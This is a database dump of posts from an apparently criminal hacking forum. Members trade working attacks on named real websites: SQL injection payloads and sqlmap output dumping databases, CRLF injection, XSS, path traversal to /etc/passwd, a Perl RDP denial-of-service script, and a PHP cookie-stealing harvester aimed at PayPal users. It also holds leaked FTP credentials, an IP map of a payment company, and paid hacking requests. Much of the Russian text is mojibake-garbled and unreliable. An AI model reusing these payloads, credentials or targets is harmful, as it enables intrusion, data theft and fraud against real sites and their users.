(952, 951, 0, 'Invite', 2, 'New invite', 1401564992, '[b]Name[/b]: Max\r\n [b]Age[/b]: 25\r\n [b]ICQ[/b]: 488670063\r\n [b]e-mail[/b]: bljat@i.ua\r\n [b]Info[/b]: .', 1, 0, '141.101.88.85', 0, 1, 0, 0, 0),
(953, 952, 0, 'Invite', 2, 'New invite', 1401565042, '[b]Name[/b]: Your name\r\n [b]Age[/b]: Age\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: e-mail\r\n [b]Info[/b]: ßþúуÿðю ÿрøòðт уÑÂ÷òøüþÑÂтø. ÃÂуöýы ÿûþщðôúø хþрþшøõ ôûѠôþрþò! Üþóñы ÑÂтðть \r\nýþрü ÿþúуÿðтõûõü õÑÂûø ýþрü уÑÂ÷òøüþÑÂтø ñуôут ÿрþôðòðтьÑÂÑÂ!.', 1, 0, '141.101.88.85', 0, 1, 0, 0, 0),
(1114, 1064, 1112, 'w0rm', 1, '', 1403713659, '×ðúð÷ ýð õ-üÑÂùû ñð÷ы, *.dk (Ãâ€Ã°Ã½Ã¸ÑÂ);\r\n200$ - 5 000 ÷ðÿøÑÂõù.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1115, 1079, 0, 'kx00', 6, 'adagio.com shop SQLi', 1403721092, 'Blind SQLi:\r\n.ttp://www.adagio.com/ajax/store_event_register.html\r\nPOST:\r\nemail=undefined\" AND 1=\"1&eventId=undefined&name=undefined&storeId=12\r\nýð ÑÂðùтõ úучúð ÑÂúуûõù ò þÑÂýþòýþü Double Blind SQLi.\r\n\r\n\r\n\r\nCRLFi:\r\n.ttp://www.adagio.com/trees/plant.html?email=%0d%0a%20w0rm.pw:kx00&estate=China_11&firstName=sndvkduf&lastName=sndvkduf&step=step2&zipcode=94102\r\n\r\n\r\nXSS:\r\n.ttp://www.adagio.com/account/login.html?proceed=quick_checkout\">&SID=fb5f4464a004b504c0a4e718d378767d', 1, 0, '77.95.57.134', 0, 1, 0, 0, 0),
(1116, 1080, 0, 'w0rm', 1, 'Microsoft Remote Desktop Use-After-Free DoS', 1403721490, 'úþôõÑÂ\r\n[code]\r\n#!/usr/bin/perl\r\n use strict;\r\n use Socket;\r\n use HTTP::Request;\r\n use LWP::UserAgent;\r\n use warnings; \r\n system(\"title The Black Devils\");\r\n system(\"color 1e\");\r\n system (\"cls\");\r\n print \" |=========================================================================|\\n\";\r\n print \" |= [!] Name : Microsoft Remote Desktop Use-After-Free DoS =|\\n\";\r\n print \" |= [!] Author : The Black Devils =|\\n\";\r\n print \" |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\\n\";\r\n print \" |=========================================================================|\\n\";\r\n \r\n print \"\\n\\n\";\r\n print \"\\t\\t\\tWelcom To AK-Remote Fuzzer\\n\\n\";\r\n print \"\\t Insert Target (ex: 192.168.1.1)\\n\";\r\n my $host = <> ;\r\n print \"\\t Target is : $host \";\r\nmy $maxchannelids = \"\\x02\\x01\\xff\" ;\r\nmy $junk =\"\\x03\\x00\\x00\\x13\".\r\n\"\\x0E\\xE0\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x01\".\r\n\"\\x00\\x08\\x00\\x00\".\r\n\"\\x00\\x00\\x00\".\r\n\"\\x03\\x00\\x00\\x6A\".\r\n\"\\x02\\xF0\\x80\".\r\n\"\\x7F\\x65\\x82\\x00\".\r\n\"\\x5E\".\r\n\"\\x04\\x01\\x01\".\r\n\"\\x04\\x01\\x01\".\r\n\"\\x01\\x01\\xFF\". \r\n\"\\x30\\x19\". \r\n$maxchannelids. \r\n\"\\x02\\x01\\xFF\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x02\\x00\\x7C\". \r\n\"\\x02\\x01\\x02\".\r\n\"\\x30\\x19\". \r\n$maxchannelids. \r\n\"\\x02\\x01\\xFF\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x02\\x00\\x7C\".\r\n\"\\x02\\x01\\x02\". \r\n\"\\x30\\x19\". \r\n$maxchannelids. \r\n\"\\x02\\x01\\xFF\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x02\\x00\\x7C\". \r\n\"\\x02\\x01\\x02\". \r\n\"\\x04\\x82\\x00\\x00\". \r\n\"\\x03\\x00\\x00\\x08\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\". \r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\". \r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\". \r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x0C\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x38\\x00\\x06\\x03\".\r\n\"\\xF0\". \r\n\"\\x03\\x00\\x00\\x09\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x21\\x80\".\r\n\"\\x03\\x00\\x00\\x13\".\r\n\"\\x0E\\xE0\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x01\".\r\n\"\\x00\\x08\\x00\\x00\".\r\n\"\\x00\\x00\\x00\".\r\n\"\\x03\\x00\\x00\\x6A\".\r\n\"\\x02\\xF0\\x80\".\r\n\"\\x7F\\x65\\x82\\x00\".\r\n\"\\x5E\".\r\n\"\\x04\\x01\\x01\".\r\n\"\\x04\\x01\\x01\".\r\n\"\\x01\\x01\\xFF\". \r\n\"\\x30\\x19\". \r\n$maxchannelids. \r\n\"\\x02\\x01\\xFF\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x02\\x00\\x7C\". \r\n\"\\x02\\x01\\x02\".\r\n\"\\x30\\x19\". \r\n$maxchannelids. \r\n\"\\x02\\x01\\xFF\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x02\\x00\\x7C\".\r\n\"\\x02\\x01\\x02\". \r\n\"\\x30\\x19\". \r\n$maxchannelids. \r\n\"\\x02\\x01\\xFF\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x01\\x00\". \r\n\"\\x02\\x01\\x01\". \r\n\"\\x02\\x02\\x00\\x7C\". \r\n\"\\x02\\x01\\x02\". \r\n\"\\x04\\x82\\x00\\x00\". \r\n\"\\x03\\x00\\x00\\x08\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\". \r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\". \r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x08\". \r\n\"\\x02\\xF0\\x80\". \r\n\"\\x28\". \r\n\"\\x03\\x00\\x00\\x0C\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x38\\x00\\x06\\x03\".\r\n\"\\xF0\". \r\n\"\\x03\\x00\\x00\\x09\".\r\n\"\\x02\\xF0\\x80\". \r\n\"\\x21\\x80\" ; \r\n# initialize port\r\n\r\nmy $port = 3389 ;\r\nmy $proto = getprotobyname(\'tcp\');\r\n# get the port address\r\nmy $iaddr = inet_aton($host);\r\nmy $paddr = sockaddr_in($port, $iaddr);\r\n\r\nprint \"[+] Setting up socket\\n\";\r\n# create the socket, connect to the port\r\nsocket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die \"socket: $!\";\r\nprint \"[+] Connecting to $host on port $port\\n\";\r\nconnect( SOCKET, $paddr) or die \"connect: $!\";\r\n\r\nprint \"[+] Sending Buffer\\n\";\r\nprint SOCKET $junk.\"\\n\";\r\nprint \"[+] Buffer sent\\n\";\r\nclose SOCKET or die goto menu; \r\n[/code]', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1117, 1081, 0, 'w0rm', 1, 'pay pall [xss]', 1403721586, 'úþôõÑÂ\n[php]\n\n\n(O)\n\n
================================------------>\n\n\\| ^^^^^^ \\:W/------------------------------------------------\'\'\'\'\'\'\n\no \n\n \n\n \n\n \n\n \n\n \n\n \n\n\n\n\";\n\n}\n\n\n\n// Gets the cookie from GET parameter returned by XSS and stores it in file\n\nfunction getCookie() {\n\nif (isset($_GET[\"c\"])) {\n\n$f = fopen(COOKIE_FILE, \"a\");\n\n$c = base64_encode($_GET[\"c\"]);\n\nfwrite($f, $c . \"\\n\");\n\nfclose($f);\n\n}\n\n}\n\n\n\n// Reads the cookie from file\n\nfunction readCookies() {\n\n$c = file_get_contents(COOKIE_FILE);\n\nreturn explode(\"\\n\", $c);\n\n}\n\n\n\n// Logs in and checks the ballance\n\nfunction check($Cookie) {\n\n$ch = curl_init();\n\ncurl_setopt($ch, CURLOPT_URL, PPLOGIN_URL);\n\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\n\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);\n\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n\ncurl_setopt($ch, CURLOPT_COOKIE, $Cookie);\n\n$s = curl_exec($ch);\n\nif (preg_match(\"/Ballance: (.*)\\<\\/b\\>/i\", $s, $z))\n\nreturn $z[1];\n\nreturn NULL;\n\n}\n\n\n\n\n\n// MAIN\n\nif (isset($_GET[\"admin\"]) && $_GET[\"admin\"] == \"true\") {\n\n$ck = readCookies();\n\necho \"\\n\";\n\necho \"Id Cookie Check \\n\";\n\n$i = 0;\n\nforeach ($ck as $c) {\n\necho \"\" . ++$i . \" $c Check \\n\";\n\n}\n\ndie(\"\");\n\n}\n\n\n\nif (isset($_GET[\"check\"]) && $_GET[\"check\"] != \"\") {\n\n$cz = check(check($_GET[\"check\"]));\n\nif ($cz != NULL)\n\necho \"Ballance: \" . $cz;\n\nelse\n\necho \"Error logging in!\";\n\ndie(\"\");\n\n}\n\n\n\n$XSS = \"\\\">\";\n\ndoXSS($XSS);\n\n?>\n[/php]', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1119, 1083, 0, 'Bo0om', 7, 'заказы на похек :)', 1403793080, 'Ãâ€Ã°Ñ‚øýó\r\n[CODE]http://www.matchaffinity.com/\r\nhttp://www.beautifulpeople.com/en-UK\r\nhttp://www.whatsyourprice.com\r\nhttp://www.lovestruck.com/london/\r\n[/CODE]\r\nÃâ€Ã¾ÑÂтðтþчýþ ÑÂúуûø, рðÑÂúрутÑÂÑ‚ ÑÂðüø, ÿрþфøт $1000-$4000\r\n\r\nçøýð\r\n[CODE]Lao Li:\r\ngzstuff.com\r\nand\r\nhttp://www.cityweekend.com.cn[/CODE]\r\nÃÂуöýð ñð÷ð. ÃÂðÑÂчõт цõýы ýõ рð÷óþòðрøòðûø, ýþ ôþóþòþрøüÑÂÑÂ.', 1, 0, '90.189.2.190', 4, 1, 0, 0, 0),
(1131, 1083, 1130, 'Bo0om', 7, '', 1403872641, 'òþт тðúøõ ÑÂúуûø уöõ õÑÂть. ø чøтðûúð. ÑÂûøть ñы.\r\n[quote][url]http://www.employmentcrossing.com/utils/openinviter/utl_openinviter.php[/url]\r\n\r\ncemail=sample%40email.tst&cname=sloywnoe&email_box=sample%40email.tst&fromemail=sample%40email.tst&fromname=sloywnoe&import=show%20contacts&manualarrstr=&password_box=g00dpa%24%24w0rd&provider_box=../../../../../../../../../../etc/passwd%00.jpg&sender_name=sloywnoe&step=get_contacts\r\n\r\n\r\n[url]http://www.employmentcrossing.com/lcjsspeedapply_thanks.php[/url]\r\nclssimilarjobs_appliedjobids=1) and 1=2 union select 1,2,3,concat_ws(char(58),column_name,table_name,table_schema),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.columns where column_name like char(37, 101, 109, 97, 105, 108, 37) limit 02,1%23\r\n\r\n[url]http://www.employmentcrossing.com/p/[/url]\r\n\r\n[url]http://www.employmentcrossing.com/lcceospeaks.php?id=2186[/url]\' òþт тут фøûьтр\r\n\r\n\r\n[url]https://www.employmentcrossing.com/lcthanks_offer3.php#mopchooser[/url]\r\npost: Clspremiercontactus_hdnsubmited=1&clspremiercontactus_hdnaction=s&clspremiercontactus_page=&clspremiercontactus_md5activationid=&clspremiercontactus_offer=3&clspremiercontactus_paymode=&clspremiercontactus_hdnpaymenttype=ccpayment&clspremiercontactus_firstname=brian&clspremiercontactus_lastname=howard&clspremiercontactus_email=brian.howard88%40hotmail.com\'&clspremiercontactus_phone=%2b1734555&clspremiercontactus_creditcardname=visa&clspremiercontactus_creditcardnum=44107516456723&clspremiercontactus_creditcardcvvnum=042&clspremiercontactus_creditmonth=1&clspremiercontactus_credityear=2017\r\n\r\n[url]https://www.employmentcrossing.com/lcsignin.php[/url]\r\npost: Clssignup_hdnsubmited=1&clssignup_hdnaction=makefirststepuser&clssignup_hdnusername=&clssignup_page=2&clssignup_md5activationid=&clsrandompromotion_email=&clssignup_refid=1500&clssignup_subscribedomain=1500&clssignup_promotioncode=free3days_1monrec&clssignup_offerpage=&clssignup_offer=35621&clssignup_offerpagename=&clssignup_email=1@1.com\'\r\n\r\n[url]https://www.employmentcrossing.com/lcactivation.php[/url]\r\npost: Clssignup_md5activationid=c0d703f6adc4a8c9ecf689e72a998960&clsrandompromotion_email=&clssignup_paymode=&clssignup_refid=1500&clssignup_offer=35621&clssignup_flag_block_resignup=0&clssignup_hdnpaymenttype=ccpayment&clssignup_selectpromocode=free3days_1monrec_9&clssignup_firstname=brian&clssignup_lastname=howard\'&clssignup_creditcardname=visa\'&clssignup_creditcardnum=44107516345678\'&clssignup_creditcardcvvnum=345&clssignup_creditmonth=1&clssignup_credityear=2015&clssignup_agreeterms=p[/quote]', 1, 0, '176.209.55.165', 0, 1, 0, 0, 0),
(1126, 1088, 1125, 'kx00', 6, '', 1403838437, '[QUOTE=Bo0om;1125]ÃÂøхõрð ýõ ÿþýÑÂû, e17, ты øýòðùт хþчõшь ÿþûучøть?)[/QUOTE]\r\n\r\nÃÂõ ÑÂÑ‚ тøÿð ÿþ ÿрøóûðшõýøю þт ÿþûь÷þòðтõûѠe17', 1, 0, '212.42.124.237', 0, 1, 0, 0, 0),
(1124, 1088, 0, 'Invite', 2, 'New invite', 1403798959, '[b]Name[/b]: ibizza77\r\n [b]Age[/b]: 27\r\n [b]ICQ[/b]: 686054586\r\n [b]e-mail[/b]: aptaxa@bk.ru\r\n [b]Info[/b]: advise the user to\r\njoin you\r\nhttp://forum.antichat.ru/member.php?userid=225099\r\n\r\nmember - e17.', 1, 0, '77.40.60.248', 0, 1, 0, 0, 0),
(1125, 1088, 1124, 'Bo0om', 7, '', 1403830083, 'ÃÂøхõрð ýõ ÿþýÑÂû, e17, ты øýòðùт хþчõшь ÿþûучøть?)', 1, 0, '90.189.2.190', 0, 1, 0, 0, 0),
(1132, 1083, 1131, 'w0rm', 1, '', 1403880813, 'Òрþôõ ýø чõóþ ÑÂûþöýþóþ\r\n\r\n[url]http://www.employmentcrossing.com/lcceospeaks.php?id=2186)+and+(1=2[/url]\r\n[url]http://www.employmentcrossing.com/lcceospeaks.php?id=2186)+and+(1=1[/url]\r\n\r\n[url]http://www.employmentcrossing.com/lcceospeaks.php?id=2186)union+select(1[/url] +\r\n[url]http://www.employmentcrossing.com/lcceospeaks.php?id=2186)union+select(1,2[/url] -\r\ncтрðýýыõ ÑÂтрðýýþÑÂтø)', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1134, 1089, 1128, 'w0rm', 1, '', 1403886884, '[url]http://www.alexa.com/topsites/countries/DK[/url]\n\n/fagbesk.sam.sdu.dk ýõт ю÷õрþò', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1135, 1083, 1132, 'kx00', 6, '', 1403897233, 'hxxp://www.employmentcrossing.com/lcceospeaks.php?id=2186)AND(if(ASCII(lower(mid(USER(),1,1)))>=1,1,2)=1 \r\n\r\nÜþöýþ уöõ ôðüÿøть чõрõ÷ ñûðùýô... Information_schema ÿрøÑÂутÑÂтòуõт.\r\n\r\nhxxp://www.employmentcrossing.com/lcceospeaks.php?id=2186)AND(if(ASCII(lower(mid((select+group_concat(schema_name)+from+information_schema.schemata),1,1)))>=1,1,2)=1\r\n\r\nÑÂþфтøýы ýõ ñõрут... ôð ø ÑÂúрøÿт тþöõ чõт... üþöõт ôõûþ ò úуúðх. х÷ úþрþч.\r\nöþÿð чуõт чтþ üþöýþ õщõ чõрõ÷ error-based òыòõÑÂтø. ÿþúð х÷ úðú... ôуüðю.. õÑÂûø úтþ úрутðýõт ôõûøтõÑÂÑŒ, ýõ рðôø ÿрþфøтð, чøÑÂтþ øýтõрõÑÂ.', 1, 0, '5.57.14.42', 0, 1, 0, 0, 0),
(1137, 1083, 1135, 'kx00', 6, '', 1403900545, 'úþрþчõ ýðôþ úþÿðть ò ÑÂтþрþýу name_const(), extractvalue()', 1, 0, '5.57.14.42', 0, 1, 0, 0, 0),
(1138, 1027, 1030, 'w0rm', 1, '', 1403924615, '[url]http://79.142.27.16/?module=news[/url]\n[QUOTE]\n - [url]http://79.142.27.16/p.php[/url] - phpinfo()\n - [url]http://79.142.27.16/mysql.php[/url] -errors\n\n[code]\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /var/www/mailadmin.mpk.ru/mysql.php on line 2\n\nWarning: mysql_connect(): Access denied for user \'mail_user\'@\'localhost\' (using password: YES) in /var/www/mailadmin.mpk.ru/mysql.php on line 2\n\nDeprecated: mysql_query(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /var/www/mailadmin.mpk.ru/mysql.php on line 3\nArray ( [0] => auto_increment_increment [1] => 1 ) Array ( [0] => auto_increment_offset [1] => 1 ) Array ( [0] => autocommit [1] => ON ) Array ( [0] => automatic_sp_privileges [1] => ON ) Array ( [0] => back_log [1] => 50 ) Array ( [0] => basedir [1] => /usr/ ) Array ( [0] => big_tables [1] => OFF ) Array ( [0] => binlog_cache_size [1] => 32768 ) Array ( [0] => binlog_direct_non_transactional_updates [1] => OFF ) Array ( [0] => binlog_format [1] => STATEMENT ) Array ( [0] => bulk_insert_buffer_size [1] => 8388608 ) Array ( [0] => character_set_client [1] => utf8 ) Array ( [0] => character_set_connection [1] => utf8 ) Array ( [0] => character_set_database [1] => utf8 ) Array ( [0] => character_set_filesystem [1] => binary ) Array ( [0] => character_set_results [1] => utf8 ) Array ( [0] => character_set_server [1] => utf8 ) Array ( [0] => character_set_system [1] => utf8 ) Array ( [0] => character_sets_dir [1] => /usr/share/mysql/charsets/ ) \nWarning: mysql_close() expects parameter 1 to be resource, boolean given in /var/www/mailadmin.mpk.ru/mysql.php on line 8\n[/code]\n - [url]http://79.142.27.16/?module=people&action=view[/url]\n - [url]http://79.142.27.16/?module=admin&action=view[/url]\n[/QUOTE]\n\n[url]https://79.142.27.35/index.htm[/url]\n\n[code]\n88-94 \n+ [url]https://79.142.27.135/[/url] \n+ [url]http://79.142.27.178/view/index.shtml[/url] \ns1044.qiwi.com\n[url]https://79.142.19.10/[/url]\n[url]http://79.142.26.43/[/url]\n[url]https://79.142.22.22/[/url]\n[url]https://lync.qiwi.ru/[/url]\n[url]https://79.142.18.23/[/url]\n[url]https://79.142.18.21/[/url]\n[/code]\nÿрþùтøÑÂÑŒ ÑÂúðýõрþü ôøр\n\n\n[url]http://79.142.26.42/[/url]\nmango.qiwi.com\n[url]https://send.qiwi.ru/auth[/url]\n[url]http://www.arena-group.ru/[/url]\n[url]https://79.142.27.179/cgi-bin/enter.cgi[/url] - video\n[url]https://79.142.25.200[/url] - ibank\n79.142.23.4:443 mail\n[url]https://79.142.22.2/+CSCOE+/logon.html?fcadbadd=1[/url] + vpn\n[url]http://79.142.22.19/[/url] sms\n79.142.20.82:2000 - cisco\n[url]https://79.142.17.37/[/url]\n[url]https://agent.qiwi.com/[/url]\n[url]https://79.142.17.70/[/url] WTF???!\n\n[url]https://79.142.17.130/[/url]\n\n[url]ftp://automat:CkyaHjozpZw@79.142.17.91:21/[/url]', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1139, 1091, 0, 'Invite', 2, 'New invite', 1403988237, '[b]Name[/b]: n0b0dy\r\n [b]Age[/b]: 100\r\n [b]ICQ[/b]: 16232242\r\n [b]e-mail[/b]: inbulk@crawler.com\r\n [b]Info[/b]: .', 1, 0, '87.117.199.174', 0, 1, 0, 0, 0),
(1140, 1063, 1082, 'Bo0om', 7, '', 1404006414, '[QUOTE=w0rm;1082]ты þшøñðÃȄÂÑÂ) \r\n\r\nÜøýутúð ðñрõòøðтур:\r\n\r\nlocal_file_include ýõ üþöõт ñыть remote_code_ÑÂúÑÂÑÂѠøñþ local<>рõüþут ýþ ýø úðú ýõ рðòýþ.\r\n \r\nÃÂтþ úðú ýð÷òðть уÑÂ÷òøüþÑÂть ò ôöуüûõ 0day, òрþôõ ø ÿрõòðô_ñðó_ø_0ôýõù úðú ýðшõû, ýþ 0day ÑÂтþ уÑÂ÷òøüþÑÂтø ò ÿþ урþòýѠÑÂôрð.[/QUOTE]\r\n\r\nlfi != rfi? Ãâ€Ã° ûðôýþ, ты üýõ þтúрыû ÃÂüõрøúу)\r\nï óþòþрю þ тþü, чтþ lfi - ÿþ ôõфþûту rce.\r\nÜþöýþ чøтðть ûþóø, üþöýþ ÷ðю÷ðть proc self envirion, øÑÂÿþûь÷þòðть òрðÿÿõры, ýðúþýõц.\r\n\r\nÒþт ýþрü ÑÂтðтьÑÂ\r\n[url]http://www.xakep.ru/post/49508/[/url]\r\n\r\nàøýúûуôøть xss øûø sqlinj ýõ ÿþûучøтÑÂÑÂ, include() ýõ ÿþýøüðõт url ÑÂхõü, øýðчõ ñыûþ ñы ÿрþщõ.\r\n\r\nÃËœ òðщõ allow_url_include уöõ òыúûючõýð ûõт 100 ýð÷ðô ÿþ ôõфþûту', 1, 0, '176.209.56.166', 0, 1, 0, 0, 0),
(1141, 1092, 0, 'w0rm', 1, 'coru.in (coru.ws)', 1404040431, 'ÑÂúøýуû:[B]Bo0om[/B]\nÿðÑÂÑÂ:ëëëëë\n[URL=\"https://www.dropbox.com/s/f3x6dtt7j1kx5lt/Coru_in.rar\"]Download[/URL]', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1142, 1093, 0, 'Invite', 2, 'New invite', 1404050514, '[b]Name[/b]: pnig0s\r\n [b]Age[/b]: 23\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: pnigos@live.com\r\n [b]Info[/b]: Work @ Alibaba\r\nFocus on:\r\n1,Web Security(mainly on Browser Security,XML \r\nSecurity,WebService Security,Javascript&HTML5 Security)\r\n2,Android Security\r\n3,Security Products R&D\r\n\r\nAcknowledge:\r\nGoogle Hall of Fame&Rewards\r\nTwitter Hall of Fame\r\nYahoo Hall of Fame&Rewards\r\nEbay Hall of Fame\r\nEvernote Hall of Fame\r\nYandex Hall of Fame&Rewards\r\nFlowdock Hall of Fame&Rewards\r\nMailchimp Hall of Fame\r\nMoodle Hall of Fame.', 1, 0, '114.252.103.141', 0, 1, 0, 0, 0),
(1143, 1093, 1142, 'w0rm', 1, '', 1404054080, 'ï ôуüðю ÿþùôõт.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1144, 1093, 1143, 'kx00', 6, '', 1404058895, 'ÃÂтþ ñõûþшÃȄÂÿыù... úðú òðрøðýт ýõ ñуôõт ÑÂûøòðть øýфу? ôðöõ ÿрþ тþöõ ÑÂðüыù ebay...', 1, 0, '31.192.252.118', 0, 1, 0, 0, 0),
(1145, 1093, 1144, 'w0rm', 1, '', 1404061009, 'ѠþтÿøÑÂðû õüу ò тòø, òòõôу ò úурѠôõûð - ÿþÑÂüþтрøü чтþ ÑÂúðöõт', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1146, 1089, 1134, 'Psych0tr1a', 11, '', 1404072587, '[url]http://www.jobs.sdu.dk/vis_stilling.php?id=7526&lang=eng/../../../../../../../../../../../etc/passwd[/url]\r\n\r\nх÷ ÿþчõüу ýõ рðñþтðõт =(', 1, 0, '79.139.233.12', 0, 1, 0, 0, 0),
(1159, 1089, 1146, 'Psych0tr1a', 11, '', 1404147831, '[URL]http://www.mobil-forum.dk[/URL]\nvBulletin v4.2.0\n\n×ðю÷ðû ÑÂúÑÂÿûþøт\náþ÷ôðû ю÷õрð Doodlez1337 Ѡÿðрþûõü Doodlez13\nßрðòð ðôüøýÑÂúøõ\n\nýõ üþóу ÷ðùтø ò\n[URL]http://www.mobil-forum.dk/admincp/index.php[/URL]\n\nðôüøý ÿøôрøûð ÿþÑÂтðòøû ÿðрþûь ýð ôøрõúтþрøю', 1, 0, '79.139.233.12', 0, 1, 0, 0, 0),
(1148, 1093, 1145, 'syslink', 13, '', 1404079432, 'I support, waiting for chat log :)', 1, 0, '81.17.28.58', 0, 1, 0, 0, 0),
(1149, 1094, 0, 'null', 9, 'Bitrix', 1404104471, 'ÕÑÂть у úþóþ уÑÂ÷òøüþÑÂтø ôûѠBitrix?', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
(1150, 1083, 1130, 'null', 9, '', 1404112671, '[QUOTE=Bo0om;1130][CODE]www.menshealth.com - ~ $2000\r\nwww.employmentcrossing.com < $1000\r\nwww.acaloriecounter.com < $1000[/CODE][/QUOTE]\r\n\r\nÃÂуöýð рðñþчðѠSql øûø ôðüÿ ñð÷ы?', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
(1151, 1083, 1150, 'null', 9, '', 1404112836, 'Òþт ýþрüðûьýðѠÑÂúуûѠòÑÂõ ôþÑÂтðõтÑÂѠýð ãà ð!\r\nsqlmap -u \"https://www.employmentcrossing.com/lcactivation.php?activation=d1ddead0a20ed01bc4b916675ae2649c\" --dbs\r\n\r\n sqlmap/1.0-dev - automatic SQL injection and database takeover tool\r\n [url]http://sqlmap.org[/url]\r\n\r\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\'s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\r\n\r\n[*] starting at 07:16:21\r\n\r\n[07:16:21] [INFO] resuming back-end DBMS \'mysql\'\r\n[07:16:21] [INFO] testing connection to the target URL\r\nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:\r\n---\r\nPlace: GET\r\nParameter: activation\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: activation=d1ddead0a20ed01bc4b916675ae2649c\' AND 2473=2473 AND \'hoIQ\'=\'hoIQ\r\n\r\n Type: UNION query\r\n Title: MySQL UNION query (NULL) - 78 columns\r\n Payload: activation=-7694\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7179787971,0x6a6d465a61694e4b5353,0x7169747771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\r\n---\r\n[07:16:25] [INFO] the back-end DBMS is MySQL\r\nweb application technology: Apache\r\nback-end DBMS: MySQL 5\r\n[07:16:25] [INFO] fetching database names\r\n[07:16:28] [INFO] the SQL query used returns 4 entries\r\n[07:16:31] [INFO] retrieved: \"information_schema\"\r\n[07:16:34] [INFO] retrieved: \"ec_jp\"\r\n[07:16:37] [INFO] retrieved: \"sellingcrossing\"\r\n[07:16:40] [INFO] retrieved: \"sellingcrossing_external\"\r\navailable databases [4]:\r\n[*] ec_jp\r\n[*] information_schema\r\n[*] sellingcrossing\r\n[*] sellingcrossing_external', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
